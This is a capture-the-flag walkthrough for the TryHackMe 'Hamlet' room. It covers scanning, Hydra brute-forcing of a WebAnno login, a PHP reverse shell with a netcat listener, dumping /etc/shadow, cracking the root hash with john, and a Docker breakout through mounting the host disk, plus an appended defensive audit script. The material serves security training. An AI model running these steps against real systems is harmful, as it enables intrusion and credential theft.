@siegy22
Created September 11, 2023 19:43

Hamlet TryHackMe

Enumeration

nmap

☁  ~  nmap --min-rate=3000 -sV -sC -o nmap hamlet.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 20:04 CEST
Nmap scan report for hamlet.thm (10.10.196.230)
Host is up (0.044s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT      STATE  SERVICE    VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp        vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
|_-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.18.14.219
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
|   256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
|_  256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (ED25519)
80/tcp    open   http       lighttpd 1.4.45
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
8000/tcp  open   http       Apache httpd 2.4.48 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.48 (Debian)
8080/tcp  closed http-proxy
50000/tcp closed ibm-db2
50001/tcp closed unknown
50002/tcp closed iiimsf
50003/tcp closed unknown
50006/tcp closed unknown
50300/tcp closed unknown
50389/tcp closed unknown
50500/tcp closed unknown
50636/tcp closed unknown
50800/tcp closed unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds

dirb

☁  hamlet  dirb http://hamlet.thm/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 11 21:17:10 2023
URL_BASE: http://hamlet.thm/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://hamlet.thm/ ----
+ http://hamlet.thm/index.html (CODE:200|SIZE:1011)                                                                
+ http://hamlet.thm/robots.txt (CODE:200|SIZE:64)                                                                  
                                                                                                                   
-----------------
END_TIME: Mon Sep 11 21:20:13 2023
DOWNLOADED: 4612 - FOUND: 2

Access

Robots.txt

http://hamlet.thm/robots.txt

User-agent: *
Allow: /

THM{1_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

FTP anonymous

☁  ~  ftp hamlet.thm
Connected to hamlet.thm.
220 (vsFTPd 3.0.3)
Name (hamlet.thm:ysi): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50995|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
226 Directory send OK.
ftp> get password-policy.md
local: password-policy.md remote: password-policy.md
229 Entering Extended Passive Mode (|||50128|)
150 Opening BINARY mode data connection for password-policy.md (113 bytes).
100% |***********************************************************************|   113       70.46 KiB/s    00:00 ETA
226 Transfer complete.
113 bytes received in 00:00 (2.76 KiB/s)
ftp> get ufw.status
local: ufw.status remote: ufw.status
229 Entering Extended Passive Mode (|||50573|)
150 Opening BINARY mode data connection for ufw.status (1425 bytes).
100% |***********************************************************************|  1425        3.42 MiB/s    00:00 ETA
226 Transfer complete.
1425 bytes received in 00:00 (36.19 KiB/s)
ftp> ^D
221 Goodbye.

CEWL

$ cewl --lowercase -d 1 -m 12 -w docswords.txt http://hamlet.thm/hamlet.txt

Hydra

☁  hamlet  hydra -l ghost -P docswords.txt hamlet.thm http-post-form "/login.html?-1.-loginForm:username=ghost&password=^PASS^:Login failed" -s 8080 -t 2
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-11 20:25:34
[DATA] max 2 tasks per 1 server, overall 2 tasks, 75 login tries (l:1/p:75), ~38 tries per task
[DATA] attacking http-post-form://hamlet.thm:8080/login.html?-1.-loginForm:username=ghost&password=^PASS^:Login failed
[8080][http-post-form] host: hamlet.thm   login: ghost   password: vnsanctified
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-11 20:26:19

Admin WebAnno

[screenshot]

Don't forget that the KEQehFDWwuQbMbKW password does not work for WebAnno.

PHP Reverse Shell

Project settings page: http://hamlet.thm:8080/projectsetting.html?18
Payload: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

☁  ~  nc -lvnp 4242
Listening on 0.0.0.0 4242

http://hamlet.thm:8000/repository/project/0/document/2/source/php-reverse-shell.php -> Shell opened

Shell

$ whoami
www-data
$ ls -alh /etc/shadow
-rw-r----- 1 root shadow 573 Sep 15  2021 /etc/shadow
$ cat /etc/shadow
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:18885:0:99999:7:::
daemon:*:18872:0:99999:7:::
bin:*:18872:0:99999:7:::
sys:*:18872:0:99999:7:::
sync:*:18872:0:99999:7:::
games:*:18872:0:99999:7:::
man:*:18872:0:99999:7:::
lp:*:18872:0:99999:7:::
mail:*:18872:0:99999:7:::
news:*:18872:0:99999:7:::
uucp:*:18872:0:99999:7:::
proxy:*:18872:0:99999:7:::
www-data:*:18872:0:99999:7:::
backup:*:18872:0:99999:7:::
list:*:18872:0:99999:7:::
irc:*:18872:0:99999:7:::
gnats:*:18872:0:99999:7:::
nobody:*:18872:0:99999:7:::
_apt:*:18872:0:99999:7:::
$ df -h
Filesystem                         Size  Used Avail Use% Mounted on
overlay                             19G  7.3G   11G  42% /
tmpfs                               64M     0   64M   0% /dev
tmpfs                              996M     0  996M   0% /sys/fs/cgroup
shm                                 64M     0   64M   0% /dev/shm
/dev/mapper/ubuntu--vg-ubuntu--lv   19G  7.3G   11G  42% /stage
$ ls -lah /stage
total 12K
drwxr-xr-x 2 root root 4.0K Sep 15  2021 .
drwxr-xr-x 1 root root 4.0K Sep 15  2021 ..
-rw-r--r-- 1 root root   29 Sep 16  2021 flag
$ cat /stage/flag
THM{4_xxxxxxxxxxxxxx}

Root PW

Copy the root hash $y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4 (from the /etc/shadow output above) into passwords.txt and run it through john. Unshadow reference: https://erev0s.com/blog/cracking-etcshadow-john/

☁  hamlet  john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt  passwords.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
murder           (root)     
1g 0:00:00:16 DONE (2023-09-11 20:50) 0.06042g/s 295.8p/s 295.8c/s 295.8C/s 2222222..asasas
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
$ su -
Password: murder

whoami
root
bash
ls
ls -lah
total 20K
drwx------ 1 root root 4.0K Sep 15  2021 .
drwxr-xr-x 1 root root 4.0K Sep 15  2021 ..
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
-rw-r--r-- 1 root root   24 Sep 16  2021 .flag
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile

Docker escape

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#capabilities-abuse-escape

mkdir /mnt/os-disk
mount /dev/dm-0 /mnt/os-disk
cat /mnt/os-disk/root/flag

THM{6_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
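Added as a defensive audit (example code, not from the gist or the linked HackTricks page): a Python check that reads the two indicators the escape above depends on, a mount-capable effective capability set and a host block device visible from inside the container (here the LVM volume mounted at /stage in the df output). In real use it would read /proc/self/status and /proc/mounts; the samples below are constructed, and the "dangerous" capability subset is an assumption.

```python
import re

# Capability bit numbers from linux/capability.h, limited to the ones that
# matter for breakout risk (mount(2), raw device I/O, module loading, ptrace).
DANGEROUS_CAPS = {
    "CAP_DAC_READ_SEARCH": 2, "CAP_NET_ADMIN": 12, "CAP_SYS_MODULE": 16,
    "CAP_SYS_RAWIO": 17, "CAP_SYS_PTRACE": 19, "CAP_SYS_ADMIN": 21,
}
BLOCK_DEV_RE = re.compile(r"^/dev/(sd|vd|xvd|nvme|dm-|mapper/)")

def effective_caps(status_text):
    """Decode the CapEff mask from /proc/<pid>/status into dangerous-cap names."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line in status text")
    mask = int(m.group(1), 16)
    return {name for name, bit in DANGEROUS_CAPS.items() if mask >> bit & 1}

def host_block_mounts(mounts_text):
    """From /proc/mounts, list (device, mountpoint) pairs backed by a real block
    device (not overlay/tmpfs): host disks reachable from inside the container."""
    found = []
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and BLOCK_DEV_RE.match(parts[0]):
            found.append((parts[0], parts[1]))
    return found

def escape_risk(status_text, mounts_text):
    """Human-readable findings; an empty list means neither indicator is present."""
    findings = [f"{c} is effective" for c in sorted(effective_caps(status_text))]
    findings += [f"host block device {d} mounted at {m}" for d, m in host_block_mounts(mounts_text)]
    return findings

# Constructed samples. PRIVILEGED mirrors a --privileged container (all caps)
# with the host's LVM volume mounted at /stage, as in the df output above;
# DEFAULT is Docker's stock CapEff with only an overlay root filesystem.
PRIVILEGED_STATUS = "Name:\tbash\nCapInh:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n"
DEFAULT_STATUS = "Name:\tbash\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
SAMPLE_MOUNTS = (
    "overlay / overlay rw,relatime 0 0\n"
    "tmpfs /dev tmpfs rw,nosuid,size=65536k 0 0\n"
    "shm /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0\n"
    "/dev/mapper/ubuntu--vg-ubuntu--lv /stage ext4 rw,relatime 0 0\n"
)
```

The mitigation is the inverse of both findings: run the container without `--privileged` or `CAP_SYS_ADMIN`, and never bind-mount or pass through host block devices that the workload does not need.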

Password Policy

WebAnno

New passwords should be:

  • lowercase
  • between 12 and 14 characters long

ufw.status

Status: active
To Action From
-- ------ ----
20/tcp ALLOW Anywhere
21/tcp ALLOW Anywhere
22/tcp ALLOW Anywhere
80/tcp ALLOW Anywhere
501/tcp ALLOW Anywhere
8080/tcp ALLOW Anywhere
8000/tcp ALLOW Anywhere
1603/tcp ALLOW Anywhere
1564/tcp ALLOW Anywhere
50000:50999/tcp ALLOW Anywhere
20/tcp (v6) ALLOW Anywhere (v6)
21/tcp (v6) ALLOW Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
80/tcp (v6) ALLOW Anywhere (v6)
501/tcp (v6) ALLOW Anywhere (v6)
8080/tcp (v6) ALLOW Anywhere (v6)
8000/tcp (v6) ALLOW Anywhere (v6)
1603/tcp (v6) ALLOW Anywhere (v6)
1564/tcp (v6) ALLOW Anywhere (v6)
50000:50999/tcp (v6) ALLOW Anywhere (v6)